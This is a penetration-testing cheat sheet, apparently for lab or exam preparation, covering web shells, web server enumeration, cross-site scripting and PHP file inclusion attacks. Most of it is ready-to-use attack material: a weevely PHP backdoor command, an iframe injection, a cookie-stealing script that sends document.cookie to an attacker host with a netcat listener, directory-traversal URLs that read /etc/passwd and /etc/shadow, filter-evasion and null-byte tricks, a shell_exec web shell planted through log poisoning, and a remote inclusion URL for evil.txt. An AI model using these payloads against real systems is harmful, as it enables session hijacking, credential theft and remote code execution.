Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

Java Signed Applet Attack

HTTP / HTTPS Webserver Enumeration

OWASP Dirbuster

nikto -h $ip

Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more

Browser Redirection and IFRAME Injection

<iframe SRC="http://$ip/report" height = "0" width="0"></iframe>

Stealing Cookies and Session Information

<javascript>
new image().src="http://$ip/bogus.php?output="+document.cookie;
</script>

nc -nlvp 80

File Inclusion Vulnerabilities

Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.

fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
https://github.com/kurobeats/fimap
Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.

For Local File Inclusions look for the include() function in PHP code.

include("lang/".$_COOKIE['lang']);
include($_GET['page'].".php");

LFI - Encode and Decode a file using base64

curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d

LFI - Download file with base 64 encoding
http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php

LFI Linux Files:
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/passwd
/etc/shadow
/root/.bash_history
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root

LFI Windows Files:
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt

LFI OSX Files:
/etc/fstab
/etc/master.passwd
/etc/resolv.conf
/etc/sudoers
/etc/sysctl.conf

LFI - Download passwords file
http://$ip/index.php?page=/etc/passwd
http://$ip/index.php?file=../../../../etc/passwd

LFI - Download passwords file with filter evasion
http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd

Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>

For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files

/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "on"

include($_REQUEST["file"].".php");

Remote File Inclusion

http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt

<?php echo shell\_exec("ipconfig");?>